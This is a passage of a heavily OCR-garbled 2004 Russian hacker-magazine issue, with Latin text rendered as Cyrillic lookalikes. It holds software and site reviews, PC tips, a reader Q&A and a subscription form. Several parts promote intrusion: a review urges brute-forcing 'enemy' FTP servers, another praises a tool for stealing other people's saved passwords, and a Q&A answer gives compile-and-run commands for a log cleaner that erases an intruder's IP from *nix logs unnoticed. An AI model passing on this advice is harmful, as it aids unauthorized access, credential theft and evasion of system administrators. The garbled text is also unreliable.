самой быстрой из когда-либо существовавших. 

Подробности на 

ѵѵѵѵѵѵ.ксІе.огд/аппоипсетепіз/аппоипсе-3.2.рИр. 

Из других релизов: ОрепѵѵаІІ СІЧІІ/ѴІ-іпих 1.1; 
Му501-5.0.0-а1рба; А5РУпих9.2 Ьеіа; ЕгееВЗО 5.2 и 
5.2.1 -ВС; МогіІІа 1.6; Мапбгаке Упих 10.0 Веіа; 
КСЖсе 1 .3; КЭеѵеІор 3.0; СІЧОМЕ 2.5.3; Упих 2.6.2. 



139 





ІТЫ 







ШЕ О N111.2.13 




П вижок МогіІГы давно хорошо 
зарекомендовал себя среди 
разработчиков браузеров. Подтве- 
рждением этому служит множество 
проектов, занимающихся создани- 
ем МохіІІа-ЬазесІ обозревателей. 
Саіеоп - один из представителей 
подобных "облегченных" версий 
популярного ореп-зоигсе проекта. 
Он давно завоевал любовь многих, 
причем далеко не только сторонни- 
ков СІМОМЕ, для которого этот про- 
дукт был создан. В силу того, что 
Саіеоп базируется на МогіІГе, он 
обладает полноценным набором 
возможностей, необходимых для 
просмотра современных юѵѵѵѵ- ре- 
сурсов. И проблем со всякими сер- 
тификатами, например, 331 2/3, 
ИЗ не возникает. 

Главным лозунгом проекта являет- 
ся простота и соответствие стан- 
дартам, что делает браузер отлич- 



ной альтернативой все той же 
МохіІГе. Правда, заявленная разра- 
ботчиками простота ставится под 
сомнение, когда приходится до- 
вольно долго ждать, пока загрузит- 
ся приложение. Это и является 
главным минусом софтины. Зато 
скорость работы браузера с лихвой 
окупает его тормознутость на стар- 
те. 

Внешний вид, выполненный в тра- 
дициях СІМОМЕ, интуитивно поня- 
тен и приятен для любителей прос- 
тоты и минимализма. Небывалое 
удовольствие доставляют вкладки в 
меню Зе№пд$, где можно одним 
кликом включать/отключать загруз- 
ку изображений и анимацию на 
сайтах. Лично у меня эта функция 
вызвала быстрое привыкание, а ее 
отсутствие во всех увиденных ана- 
логах - глубокое разочарование. 

*- это последняя стабильная версия 
приложения. Параллельно с ней раз- 
рабатывается ветка 1.3.x (Іазі ипзіаЫе 
1 .3.12), которая использует вторую вер- 
сию СТК- и со временем превратится в 
Саіеоп 2.0. 





^ ШЕМНОИ1 1.1.1 



Р05ІХ, ВеОЗ 

5іге (в ,дг): 563 Кб* 
Іійр://Ідате$.$оіігсе1огде.пе( 
Лицензия: Ш (И 



I СепегаІ - пошаговая стратегия, 
созданная под впечатлением от 
Рапгег СепегаІ и хорошо передающая 
атмосферу оригинала своей лаконич- 
ностью. Игра будет настоящей наход- 
кой для любителей военной тактики - 
без предварительной подготовки на 
легкое прохождение уровней можешь 
не рассчитывать. Действие происхо- 
дит во время Второй мировой войны 
- надо защитить Курск и захватить 
Берлин. Среди предлагаемой в рас- 
поряжение армии присутствуют раз- 




личные виды пехоты, артиллерии, 
танков и прочей наземной техники, 
военных кораблей и самолетов. Дос- 
товерно воспроизведенная местность 
также сказывается на характере битв: 
холмы и реки значительно затрудня- 
ют передвижение, в то время как до- 
роги ему существенно способствуют. 
Из минусов стоит отметить относи- 
тельно небольшое количество сцена- 
риев (38), но проблема решается их 
конвертированием из оригинальной 



ГО. 

- кроме основного движка, понадобится 



либо файл Ідепегаі-гіаіа-х.ххіаг.ді со 
сценариями, либо Ідс-рд-х.х.Шг.ді для кон- 
вертирования существующих файлов 



Рапгег СепегаІ в формат ІдепегаІ. 




^ РТР ВКЕПКЕВ 




Н е знаю, как ты, а я всегда выбирал 
софт для подбора паролей очень 
тщательно. А первое знакомство с 
программами такого рода произошло 
буквально два года назад, когда я 
впервые увидел брутфорсер для асек. 
Скачав и установив его, я был вне се- 
бя от счастья. Но что-то я отвлекся, 
бурная ностальгия, понимаешь =). 



Так о чем я? Ах, да! Представляю тво- 
ему вниманию привлекательный 
брутфорсер для Нр-серваков. А что в 
нем такого, спросишь ты? Кроме то- 
го, что скоростные качества на весь- 
ма неплохом уровне, этой софтиной 
очень приятно пользоваться. На са- 
мом деле, весь процесс юзанья уме- 
щается в несколько действий: запус- 
тил, подключил словарь, нажал пимпу 
- и вперед, на захват вражеских Пр- 
серверов! Помимо самой прожки, в 
комплекте идет М-вариант "боѵѵ (о 
и$е” и небольшой, на 860 Кб, слова- 
рик для брута, естественно, на анг- 
лицком. Приятного подбора! 
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Т ебе когда-нибудь случалось за- 
бывать свой (или не свой =)) па- 
роль на элитный 6-знак или почту на 
риііп.ги? Если такие случаи имели 
место, радуйся - у нас в студии прог- 
раммка РаззѴіеѵѵ! Чем она примеча- 
тельна? Помимо баловства с подгля- 
дыванием паролей, скрытых за звез- 
дочками, она умеет открывать пас- 
сворды от диалапа (ВАЗ в 
ѴѴІп9х/Ме/2к/ХР/2кЗ), кэша, ІСО, 
ТгіІІІап, Мігапба, &РЮ, Раг, ѴзтІСС!, 
АОІ_ ІпзТапТ Меззепдег, М5ТТ, РС 
Петоіе, Е-Туре Ріаіег и ІѴЮІаІег. Ма- 
ло, говоришь? Ладно. Помимо этого, 
РаззѴіеѵѵ с легкостью достанет для 



тебя пароли из самых популярных 
почтовиков (ТТіеВаІ!, ОиТІоок, Веску! 
МаіІ), поможет достучаться до Нр- 
сервера на Народе, вытащив пароли 
из ТоТаІ (Мпбоѵѵз) Соттапбег'а. Ра- 
ботать с программой одно удоволь- 
ствие - запустил, сделал пару кликов 
мышью, и вся инфа как на ладони. 
Тебе остается только сохранить всю 
награбленную кипу паролей в 
ТхТ'шник и быстро уносить ноги, пока 
хозяин этих самых пассвордов (под 
хозяином автор понимает читателя - 
прим, ред.) не заподозрил неладное. 
Но на этом разработчики софтины, 
которые, кстати, родом из России, не 
остановились. В придачу в архиве 
идет еще одна прожка под названием 
РаззМакег, которая поможет в корот- 
кое время сгенерировать пароль по 
заданным параметрам. И представь 
себе, все это бесплатно. 




» 



ТІР5 ТРХСНіЗ 



Хочешь увидеть свои советы в журнале? Присылай их на адрес $кІуагоѵ@геаІ.хакер.ги. 



Ведущий рубрики Тір$5Тгіск$ Иван Скляров. 



а Весите бу АІагт 

Не все знают, что комп можно использовать как будильник. Чтобы он сам включался по расписанию, 
нужно в В10$ зайти в Роиег тападетепі и разрешить Весите бу АІагт. Тогда ниже станут активны 
правила пробуждения. Там нужно установить время включения. Но чтобы комп подавал продолжи- 
тельный писк после загрузки, нужно прописать в Автозагрузку соответствующую программу. Мож- 
но поместить туда команду: 



соттапб.сот /с есііо о 61 3|беЬид 



Теперь при загрузке винды будет вылезать консоль и пищать системный динамик (в №п2К не пашет). 
Чтобы его вырубить, просто закрой окно консоли. Вот еще примеры: 



С:\Ргодгат ЕІІе$\ІУІпатр\»іпатр.ехе 
С:\ШОШЕВІА\ТАВАІАѴ 




приложении 



• 50 фрагментов лучших фильмов 

• Тесты для настройки ДК 

• Полезные советы: 

все, что вам нужно знать при покупке 0\Ю 



КАТАЛОГ 
ВСЕХ ДИСКОВ 



9 



ВЫПУЩЕННЫХ 
В РОССИИ ЗА ПОЛ ГОДА 



350 ОБЗОРОВ 



Тогда будет запускаться ШАМР и играть твой саунд, но колонки должны быть включены всю ночь. 
Если ты часто перезагружаешься, можно класть не в Автозагрузку, а в "Назначенные задания", и 
поставить запуск команды только по утрам (рекомендую ставить время_старта_компа плюс од- 
на_минута). 

Оідііаі МопвТег 
РідітопМ.сот 



• рецензии на фильмы 

• данные о качестве изображения, звука и 
дополнительных материалов 

• биографии и фильмографии актеров 






второй выпуск 







юниты 






/ ХПКЕР/№03(БЗ)/2004 



I Опеке Зкепер (ехіегіехіегли) 




З десь выкладываются перлы из объявлений по продаже машин. Перлы сфо- 
тографированы или отсканированы, так что все честно, без дураков. Основ- 
ной предмет развлечений - конечно, многострадальная орфография. Страшно 
даже представить, сколько экзотических вариантов написания может быть у слов 
"имобилайзер" и "кондиционер". А уж воздушная подушка безопасности "аігЬад", 
которую продавцы упорно именуют "воздушным задом" - "аігбаск", вообще в 
каждом третьем объявлении. Отдельная радость - традиционная для всех иност- 
ранных машин фраза: "Один хозяин, женщина". Один хозяин - это значит, что ма- 
шина была в любящих руках всего одного человека, а не перепродавалась по 
двадцать раз. Проверить это невозможно, поэтому у всех продаваемых машин - 
один хозяин. Причем женщина. В объявлениях это отражено. Иногда даже мож- 
но видеть нарисованный 




от руки портрет этой жен- 
щины. Но лично у меня 
первое место заняло объ- 
явление: "Просто сумас- 
шедший супер-мега торг 
до упора". Эго означало, 
что продаваемую за 
$10000 тачку мужик готов 
отдать всего за $1500. 



ХУДОЖЕСТВЕННОЕ РЫЧПНИЕ 



ыыы-сІг.сІк/зкит/сідагГаг/дгоыІ.азр 



В 1 

і 



нежной и мелодич- 
ной музыке стиля 
металл есть направле- 
ние, в котором принято 
не петь, а рычать. При- 
чем рычать стильно, 
элегантно, ни в коем 
случае не похрюкивая, 
при этом ухитряясь 
воспроизводить мно- 
гозначительные тексты 
песен. Как говорят ры- 
чащие спецы, самому 
освоить эту манеру пения - почти невозможно. Но зато можно пойти по приведен- 
ной ссылке и попрактиковаться в гроул-караоке - пение мелодичным хрипом под 
металл-разметалл. Тебе там даже слова подскажут, караоке все-таки... А как же, 
обязательно! Впрочем, если хочешь, могу заранее написать первый куплет, чтобы 
при пении не отвлекаться. Вот текст: Сдддддгггггштттт, Одддддггггттттт, 
Оддддтт, \ЛЛлллллллллЛгИИииииааааа, Одддггггг, Мттггггг, Мшшиішааааа... 




і 



УЧЕБНИК РУССКОГО ЯЗЫКИ 
ДОЯ ПМЕРИКОНЦЕВ 



иыы.ти 1 іі 1 :гап.ги/І_ір 5 оп/І_ір 50 п.Н*;т 




рИ 



* ч 






С аша Липсон и Сти- 
вен Молински оття- 
нулись по полной прог- 
рамме! Это же надо бы- 
ло такого идиотизма на- 
писать для несчастных 
представителей народа, 
который захватил у ин- 
дейцев самое дорогое, 
что у них есть! Впрочем, 
оно и к лучшему, потому 
что если простой амери- 
канец выучит русский 
язык по этому учебнику, после чего радостный и просветленный приедет к нам 
в Россию общаться, - это доставит нам огромное количество сладостных ми- 
нут, да и американец будет доволен, решив, что в России все такие улыбчи- 
вые и благожелательные. Вот, для примера, упражнение на тему "Некультур- 
ные люди", цитирую: "Бездельники часто некультурные люди. Насколько я 
знаю, некультурные люди не моются? Никогда? Да, они никогда не моются. И 
они любят курить в троллейбусе". Хохма в том, что это вовсе не хохма. Такой 
учебник существует, и его можно купить на Атагоп'е. Конечно, Сашу Липсона 
за такое издевательство нужно убивать на месте, но жалко! Уж больно хочется 
пообщаться с американцем, выучившим язык по этому идиотизму в кубе. 



у всех свои тараканы 



ышы.асІгіапІаТопсІ.сот 



. 



н 




евероятно забавные 
инсектционные 
флешки. Многие из них 
реагируют на движения 
и клики мышки. Вид огду 
(эта хохма загружается 
при заходе на сайт) - 
просто шедевр. Еще там 
есть веселая штука под 
названием Іпзесі Збор 
(магазин насекомых). В 
нем можно сконструиро- 
вать свою зверушку, задав всевозможные ее параметры, вроде толщины ног, 
размаха крыльев, выражения глаз и цвета хитинового панциря. Причем изоб- 
ретенные зверушки будут не только ползать по экрану, создавая праздничное 
настроение, ты сможешь сохранить их для потомков - уж и не знаю, будут ли 
они тебе благодарны. Также рекомендую развлечься игрушкой Нипдгу Реі (го- 
лодная зверушка): по экрану начнет ползать симпатичное создание кошмар- 
ного вида, а ты его щелчком по кнопке мышки будешь кормить паучками. 
Вдохновляет и расслабляет. А когда надоест плодить инсектов и кормить их 
другими инсектами, смело нажимай нижнюю ссылку Апсігіап'з ВаШе Вой, и 
тебе загрузят целую игрушку, в которой нужно с помощью одного металлизи- 
рованного и электрифицированного жучары отбиваться от других, захватывая 
какую-то планету. Только звук на компьютере сделай погромче, чтобы окру- 
жающие точно знали, каким важным делом ты занимаешься. 
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ТЕРМОЯДЕРНОЕ РОЗВПЕЧЕНИЕ 



ехіег-ги/геѵіѳыз/ріпдиіп-зы^ 



ФИЗИОНОМИИ РОССИИ 



ыыы ■ басезНор • ги 



. 



Т ермоядерная ссылка из серии "Смерть работе и отдыху”. Суть игрушки в 
следующем. Ты просто караулишь с бейсбольной битой под скалой, а на 
скале стоит пингвин Петя (возможно, его зовут как-то по-другому, но мне нра- 
вится называть его именно так). По щелчку мыши Петя рыбкой сигает вниз. 
Второй щелчок приводит в движение биту, и тебе надо рубануть по пингвину 
так, чтобы он полетел далеко-далеко. Однако здесь есть определенные тонкос- 
ти. Дело в том, что, во-первых, нужно хотя бы попасть по пингвину, а это не так- 
то просто. Во-вторых, если шибануть Петю на подлете, то он взлетит по траек- 
тории так называемой "горки" и, хоть и пролетит достаточно далеко, затем 
воткнется в снег и никакого рекорда не будет. В-третьих, если шибануть по Пе- 
те в тот момент, когда он будет проходить где-то в районе колен, то Петя вмес- 
то летчика превратится в конькобежца и будет скользить по льду - небыстро, а 
главное - недалеко. Поэтому самый сок - шибануть Петю где-то на уровне 

третьей сверху пуго- 
вицы жилетки: тогда 
траектория его полета 
будет такой, что он 
пролетит изрядное 
расстояние, а упав, 
еще и проскользит по 
льду. Вот тогда - са- 
мые рекорды! 




ПППШПНПУШИ 



ишы ■ ІарзИа ■ ги 





И дея и содержимое проекта прямо следуют из названия - всевозможный 
гон на всевозможные темы, то есть развешивание, как говорят англичане, 
зрадбейі оп еагз, или, как говорят наши - лапши на уши. Главное в этом - гнать 
с совершенно серьезным видом, вдохновенно и убедительно. Тогда лапша 
развесится красивыми кустиками и будет создавать эффектное цветовое пят- 
но в помещении. Но самое главное в этом проекте - вовсе не забавный ново- 
стной гон. Самое главное - то, что его на первый взгляд, на второй и даже на 
третий не отличить от обычного новостного издания. Лапшиные новости, бу- 
дучи стебом и гоном, воспринимаются как вполне нормальные информацион- 
ные сообщения. Прикольные баннеры "Лапши", которые крутятся на других 
проектах, ничем не отличаются от баннеров многих других изданий, причем на 

фоне некоторых из 
них выглядят сухо, 
сдержанно и обы- 
денно. Вот в этом, 
на мой взгляд, 
заключается са- 
мый главный при- 
кол "Лапши". Она 
показывает, какую 
лапшу на уши нам 
нередко вешают 
средства массовой 
информации. Та- 
кую, что даже спе- 
циально изготов- 
ленная лапша по- 
кажется хиленькой 
вермишелькой... 



П овольно забавный проект. Придумали эту хохму - фотографирование и пуб- 
ликацию лиц самых обычных людей, чтобы составить, так сказать, обоб- 
щенный портрет города, страны или континента, - вовсе не у нас, но почему бы 
не подхватить хорошую идею? Вот и подхватили. Зачем это все? Ну, во-первых, 
просто интересно посмотреть на наши, российские физиономии. Во-вторых, 
физиономии можно отбирать по городам, роду занятий, году рождения, имени, 
фамилии и полу, а вот это уже совсем интересно. Потому что всегда забавно, 
например, посмотреть на физиономии однофамильцев. Или на физиономии 
людей одной профессии. Ведь подсознательно все время пытаешься найти в 
лицах какие-то общие черты, какие-то закономерности. Умом понимаешь, что, 
например, программисты не должны быть все на одно лицо, а закономерности 
все равно ищешь. Впрочем, в лицах представителей некоторых профессий все- 
таки должно быть что-то общее. Например, у визажистов. Потому что визажист, 
как известно, - не профессия, а сексуальная ориентация... 




это вам не на стене слово 

ШЕ22 ПИСОТЬ! 



имлы.кигбыеппѳг.сот 



Х удожники - они все очень разные. 

Подавляющее большинство из 
них рисуют на бумаге или на холсте. 

Но некоторым надоедает такой пош- 
лый подход, поэтому в качестве ба- 
зисного материала для художествен- 
ного самовыражения выбираются ве- 
щи довольно неожиданные: кастрюли, 
матрацы, автомобили, скалы, стены 
домов, женские тела и домашние жи- 
вотные. На этом сайте выложены ра- 
боты мастера, который предпочитает 
писать по... асфальту. Зовут его Курт 
Веннер, и его, видимо, не заботит, 
что асфальтовый рисунок рискует 
быть затоптанным прохожими, зали- 
тым природными осадками и замы- 
тым уборочными машинами. Впро- 
чем, на месте прохожих, машин и 
природных осадков я бы сто раз подумал, прежде чем портить такую красо- 
ту. Потому что выглядит это все просто потрясающе. Однако не следует ду- 
мать, что в галерее представлены просто красивые рисунки на асфальте. На 
самом деле все намного интереснее! Курт увлекается оптическими иллюзия- 
ми. И, создавая свои рисунки, ухитряется так выстраивать изображения, что 
со стороны картина как бы приобретает объем и перспективу. Например, ты 
видишь перед собой огромную яму, откуда пытаются выбраться люди... 
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Задавая вопрос, подумай! Не стоит мне посыпать вопросы, так ипи иначе 
связанные с хаком/кряком/фриком - дпя этого есть ІіасИад 
(Ііаск{аді(еаІ.хакер.ш), не стоит также задавать откровенно памерские вопросы, 
ответ на которые ты при определенном желании можешь найти и сам. Я не телепат, 
поэтому конкретизируй вопрос, присыпай как можно больше информации. 



іііиіінішіі 



О 



Подскажи, пожалуйста, как можно наиболее просто и быстро устранить все следы 
пребывания в *піх-системах. Какие логи нужно удалять? 





Р а Нередко встречаю в подписях сообщений от различ- 
■ ных людей следующие фразы: «N 0 ™ ріауіпд іп 
ѴѴІпатр: Аегозтійі - 1 Ооп'і ѴѴапІ То Мізз а ТТііпд» и т.п. Ска- 
чал себе последнюю версию ѴѴІпатр'а, но так и не нашел 
подобной фишки. Подскажи, как ее реализовать? 



О а Для реализации этой фишки необходим специальный 
в ѴѴІпатр'овский плагин, который умеет выводить наз- 
вание воспроизводимой композиции в текстовый файл. Та- 
кого рода плагинов сейчас невероятно много, но из лично- 
го опыта советую воспользоваться СепегаІ ІЧоѵѵ Ріауіпд РІид- 
іп (Шр://апІоп-йеуко.(Мш/). Простенькая, но в то же время 
достаточно функциональная «добавка». Плагин, помимо 
своей основной функции, обладает рядом дополнительных 
возможностей. Так, например, с его помощью можно заму- 
тить периодический экспорт статистики проигрываемых 
композиций в текстовый файл. Мелочь, конечно, но прият- 
но. Впрочем, ближе к делу. Плагин установлен - осталось 
настроить почтовый клиент. Для каждой отдельной прог- 
раммы настройки разные, я подробно остановлюсь на при- 
мере Тбе Ваі! Здесь нам поможет замечательный макрос 
«%ри1», вставляющий в тело письма содержимое любого 
текстового файла. Просто добавь следующую строчку в 
нужном месте своих шаблонов (РоМег -> ЗеШпдз -> 
Тетріаіез): 

%риІ=с:\1етр\пр.М, где пр.М - файл, создаваемый плаги- 
ном ѴѴІпатр’а. Вот и все - готово! 



р- 



Простое удаление логов - это, несомненно, вариант остаться инкогнито, но далеко не 
самый лучший. Дело в том, что админ тут же заметит это безобразие и постарается как 
можно быстрее найти и залатать все уязвимости системы. А заодно установит пару ловушек, 
чтобы ты, в конце концов, засветил свой ІР-адрес (пусть и не настоящий). Не самая радужная 
перспектива, как считаешь? Поэтому настоятельно рекомендую тебе другой способ - 
воспользоваться специальными утилитами, так называемыми «лог вайперами». Типичный 
пример такого рода софта: Шр://раскеІ$іогт$есигіІу.пІ/ШХ/репеігаІіоп/Іод-ѵѵірег$/ІодсІеапег-0.3.с. 

Тулза устанавливается и компилится проще простого: 

# дсс -о Іодсіеап Іодсіеапег-О.З.с 

# ./Іодсіеап «твой ІР-адрес» 

В итоге - все логи целы, а о тебе ни слова! 




0 а Этот файл содержит некое приветствие МОТО (Меззаде ОГ ТГте Рау), которое 
в отображается пользователю во время его входа в систему с локального или удаленного 
терминала. Сообщение по умолчанию содержит версию и тип операционной системы, номер 
сборки ядра и прочую системную информацию, однако может быть легко изменено. Что, 
впрочем, все обычно и делают. Еще бы! Ведь разглашение подобной информации заведомо 
сулит проблемы с системной безопасностью. Зачем нам лишние проблемы? Можно и вовсе 
этот файл удалить. В этом случае пользователь, разумеется, никакого приветствия не увидит. 




Р а Можно ли пультом ДУ от тюнера управлять, скажем, 
в ѴѴІпатр' ом? А то он лежит на столе мертвым грузом 
- только мешается. Хотелось бы, наконец, найти ему 
практическое применение. 



0 а Ну а почему бы, собственно, и нет? Пульт дистан- 
в ционного управления отлично ладит с программа- 
ми для просмотра ТВ, а значит, должен работать и с дру- 
гим софтом. Скажу больше - уже давно существует ути- 
литка, с легкостью это реализующая. Имя этой изуми- 
тельной проги - ЗІуСопігоІ (ІіНр://$Іу(1ітап.паго<і.гіі/гіі$/). С 
ее помощью можно управлять любимыми приложениями 
с помощью практически любого пульта ДУ. Сойдет и тот, 
которым комплектуется твоей ТВ-тюнер: для его подде- 
ржки достаточно лишь скачать и установить специальный 
плагин. Программа имеет свой собственный язык скрип- 
тов, который, в общем-то, и является основой ее конфи- 
гурирования. К счастью, этот язык знать совершенно не 
обязательно. В ЗІуСопІгоГе есть специальный мастер, в 
разы облегчающий процесс создания скриптов. Более 
того, разработчик программы и множество энтузиастов 
уже создали немало «заготовок» для работы с самыми 
разнообразными программами. Так что от тебя и вовсе 
требуется минимум усилий. Напоследок отмечу функцию 
эмуляции клавиатуры и мышки с пульта ДУ. Очень забав- 
ная вещь: я теперь даже на сообщения ІСО могу отве- 
чать, не вставая с кровати. 
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Р а Купили недавно в ІТ-отдел офиса несколько наборов радиомышек и 
■ клавиатур. Все бы хорошо, но все это дело начало жутко глючить. До- 
вольно часто идут какие-то конфликты (видимо, не могут поделить радиочас- 
тоты), максимальная дистанция работы девайсов куда меньше заявленной. 
Что посоветуешь: идти сдавать все это добро обратно в магазин, или есть 
способы пофиксить эту проблему? 



О а Разного рода конфликты между радиоаппаратурой были всегда. В пер- 
■ вую очередь, это зависит от производителей девайсов. Одни очень 
пристально следят за тем, чтобы такие накладки были абсолютно исключены. 
Другие же, напротив, пускают дело на самотек: авось обойдется. Так, напри- 
мер, мой старенький радиотелефон нередко подключается не к той базе (ес- 
ли бы совесть позволяла, мог бы звонить Биллу в Штаты), и все потому, что в 
нем отсутствует нормальная система шифрации и идентификации база-труб- 
ка. Подобных примеров море, и компьютерная периферия, к сожалению, не 
исключение. Жаль, что ты не указал, какие именно девайсы были приобрете- 
ны - придется рассматривать несколько вариантов. Вероятно, ты использу- 
ешь оборудование одного и того же производителя. Следовательно, можно 
предположить, что девайсы работают на одной несущей частоте и используют 
идентичную систему команд. Устройства от известных производителей, как 
правило, дают возможность выбора канала для передачи данных. Эта фишка 
может значительно облегчить решение проблемы. Достаточно лишь устано- 
вить индивидуальный канал для каждого девайса. Однако нередки случаи, ког- 
да радиопериферия такой возможности лишена, да и количества доступных 
каналов может попросту не хватить на все имеющиеся устройства. В этом слу- 
чае стоит попробовать провести ручную идентификацию всех устройств. То 
есть заставить приемник принимать, обрабатывать и отвечать на сигналы 
только заданного, то есть заранее идентифицированного устройства. Такую 
функцию поддерживает практически вся радиопериферия, причем эффектив- 
ность этого способа ограничивается лишь числом возможных идентификаци- 
онных номеров (а оно, как правило, не меньше 100). Его реализация зависит 
от производителя девайса, поэтому описывать что-либо в общих словах не 
имеет смысла. Советую хоть разок заглянуть в руководство пользователя. 
Кстати, радиус действия подобной аппаратуры обычно невелик: всего 1 ,5-3 
метра. Поэтому частичным решением проблемы может оказаться правильная 
расстановка (читай - на достаточном расстоянии) приемников сигнала. 




Р ш Объясни, от чего зависит сложность процесса портирования, скажем, 
■ ѵѵіп32 приложения, написанного на С/С++, под *піх систему? Что при 
этом нужно учитывать? Помоги начинающему разработчику ;). 



П а Начну с того, что операционные системы этих семейств имеют 
■ совершенно разную архитектуру. Их методы работы с потоками, 
процессами, файловой системой сильно отличаются. Поэтому функции, 
используемые тобой в программах под *піх, совершенно не обязательно 
будут работать под ѵѵіпбоѵѵз. Успех портирования напрямую зависит от того, 
сможешь ли ты найти им замену и аналоги. Соответственно, чем больше в 
программе специфических функций и процедур, тем сложнее перенести ее на 
другую платформу. Обычные пользовательские программы, а также 
несложные сетевые утилиты портируются относительно просто, так как 
обычно используют стандартные библиотечные функции. Куда хуже дела 
обстоят с системным программным обеспечением и драйверами, основная 
часть кода которых написана на системном АРІ. Портировать подобные 
приложения очень сложно. Подробно останавливаться на этом вопросе нет 
смысла: здесь поможет только умная книга и хорошая голова на плечах. 
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Правильный объем 240 страниц 



Правильный журнал 
о компьютерных играх 



Правильная комплектация 
3 СО или 0\Ю 



Правильная цена 



90 



Никакого мусора и невнятных тем, 
настоящий геймерский рай 

ТОЛЬКО РС ИГРЫ 



Подробнейший репортаж о потенциальном хите от Киевских раз- 
работчиков - ролевом боевике Хепиз 
Более 15 полновесных рецензий на наиболее увлекательные игры, 



вышедшие за месяц 

і Обзоры всех российских релизов - еще два десятка статей! 
і В рубрике "Железо" - тест современных видокарт, алгоритм вы- 
бора процессора, сравнение ТВ-тюнеров и многое другое 



Зй номер уже в продаже! 





Р а Помоги! На домашней машине у меня стоит ІТпих ПН 
в 9.0, имеющий доступ в Сеть. Недавно купил себе б/у 
ноутбук со сгоревшей сетевушкой. Сейчас мучает вопрос: 
можно ли как-нибудь соединить домашнюю тачку и ноутбук 
по нуль-модемному кабелю, чтобы лазить с ноута в инет? 
Уже столько софта перепробовал, но так ничего у меня и не 
заработало. Р.5. На ноутбуке установлена ѴѴІпХР Рго. 

О а Хм. А зачем вообще какой-либо софт, если это мож- 
в но реализовать стандартными средствами? Но обо 
всем по порядку. Все, что нужно сделать на сервере - наст- 
роить рррб на ожидание соединения. Например, так: 
#!/Ьіп/ЬазГі 
ѵѵбііе Іше; До 

/изг/зЬіп/рррД -Деіасб ІосаІ азупстар 0 сЛзсіз раззіѵе побе- 
(аиіігоиіе /Деѵ/НуЗО 115200 геіизе-сбар геіизе-рар поаиіб 
192.168.0.1:192.168.0.2 192.168.0.1 » /ѵаг/Іоск/рррД.ои! 
2>&1 

А со стороны клиента необходимо обычными стандартными 
средствами подсоединиться к серверу по нуль-модемному 
кабелю. То есть выполнить последовательно: установить 
прямое подключение к другому компьютеру -> подключить- 
ся напрямую к другому компьютеру -> ведущий компьютер 
-> имя пользователя и пароль в параметрах соединения ос- 
тавить пустыми. 




Р а Недавно приобрел себе ТВ-тюнер (АѴегМеДіа АѴегТѴ 
в ЗІпДіо 305). Сейчас, помимо просмотра каналов, хо- 
чется заняться «захватом» и монтажом видео. Какой софт 
посоветуешь? 



О а Одной из лучших утилит для захвата и монтажа видео 
в является ѴіагІиаЮиЬ (ѵѵѵѵѵѵ.ѵігІиаІДиЬ.огд). Эта миниа- 
тюрная бесплатная прога, имеющая размер всего 790 кило- 
байт, способна буквально творить чудеса с видео. И я не 
преувеличиваю! Профессиональные пакеты для обработки 
видеоматериалов могут лишь позавидовать некоторым воз- 
можностям ѴіаДиаЮиЬ'а. Используя встроенные фильтры, а 
также внешние плагины, можно легко устранить помехи и 
недостатки изображения, добавить эффекты, подкорректи- 
ровать цвет и контраст и многое-многое другое. Единствен- 
ный недостаток программы заключается в том, что она ра- 
ботает по типу ѴйеоРогѴѴІпбоѵѵз. Это означает, что макси- 
мальное разрешение для захвата 352x288. Согласен, не 
впечатляет! Но в большинстве случае и этого достаточно. 
Впрочем, если тебя это не устраивает, то рекомендую вос- 
пользоваться другой прекрасной утилитой - іиѴСН («им.іиіа- 
Ьз.согп). Используя метод ЭігесІЗІтоѵѵ, она не имеет ограни- 
чений на разрешения захватываемого видео. Более того, 
тулза невероятно проста и удобна в использовании, и име- 
ет массу интересных фишек. Особенно хочется отметить 
возможность реализовать захват по расписанию. Теперь ты 
точно не пропустишь кино или футбольный матч с любимой 
командой. 




ЕСЛИ ТЫ ГЕЙМЕР -ТЫ НЕ ПРОПУСТИШЬ! 





РЕДАКЦИОННАЯ 



А 




ВЫ МОЖЕТЕ ОФОРМИТЬ РЕДАКЦИОННУЮ ПОДПИСКУ НА ЛЮБОЙ РОССИЙСКИЙ АДРЕС 



БЕСПЛАТНАЯ 

КУРЬЕРСКАЯ ДОСТАВКА ПО МОСКВЕ 

Хочешь получать журнал 
через 3 дня после выхода? 

Звони 935-70-34 



ДЛЯ ЭТОГО НЕОБХОДИМО: 



1. Заполнить подписной купон (или 
его ксерокопию) 

2. Заполнить квитанцию (или 
ксерокопию). Стоимость подписки 
заполняется из расчета: 

Хакер 

6 месяцев - 420 рублей 
12 месяцев - 840 рублей 

Хакер + 2 СО 

6 месяцев - 690 
12 месяцев 



)9Ц Р ублей 

1 ЗоО рублей 



(В стоимость подписки включена 
доставка заказной бандеролью.) 

3. Перечислить стоимость подписки 
через Сбербанк. 

4. Обязательно прислать в редакцию 
копию оплаченной квитанции с четко 
заполненным купоном 

или по электронной почте 
5иЬ5сгіЬе_ха@датеІап<±ги 
или по факсу 924-9694 (с 
пометкой "редакционная подписка"), 
или по адресу: 

107031, Москва, Дмитровский 
переулок, д 4, строение 2,000 "Гейм 
Лэнд" (с пометкой "Редакционная 
подписка"). 

Рекомендуем использовать 
электронную почту или факс. 



Если мы получаем заявку 
после 5-го числа текущего месяца, 
доставка начинается со 
следующего месяца 

справки по электронной почте 
5иЬзсгіЬе_ха@датеІапсІ.ги 
или по тел. (095) 935-7034 

В случае отмены заказчиком 
произведенной подписки, деньги за 
подписку не возвращаются 



ПОДПИСНОЙ КУПОН (редакционная подписка) 

Прошу оформить подписку на журнал "Хакер" 



□ 

□ 



Ф.И.О. 



На 6 месяцев, начиная с_ 
На 12 месяцев, начиная с 



(отметь квадрат, выбранного варианта подписки) 



□ без диска 

□ 2 СО 

(выбери комплектацию) 



индекс 


город 




улица, дом, квартира 


телефон 


ПОДПИСЬ 


сумма оплаты 



Извещение 



Кассир 



Квитанция 

Кассир 



->€ 



ИНН 



7729410015 



ООО "ГеймЛэнд" 



ЗАО «Международный Московский Банк», г. Москва 



р/с №40702810700010298407 



к/с №30101810300000000545 



БИК 044525545 




КПП: 772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала "Хакер" 




Сумма 


С 


2004 г. 





Подпись плательщика 



ИНН 



7729410015 



ООО ТеймЛэнд" 



ЗАО «Международный Московский Банк», г. Москва 



р/с №40702810700010298407 



к/с №30101810300000000545 



БИК 044525545 



КПП: 772901001 



Плательщик 



Адрес (с индексом) 



Назначение платежа 




Сумма 


Оплата журнала "Хакер" 






С 


2004 г. 





Подпись плательщика 



Подписка для юридических лиц 



ѵѵѵѵѵѵ.іпІегросНІа.ги 



Москва: ООО "Интер-Почта", тел.: 500-00-60, е-таіі: іп1ег-роз1@зоѵіпіеІ.ги 

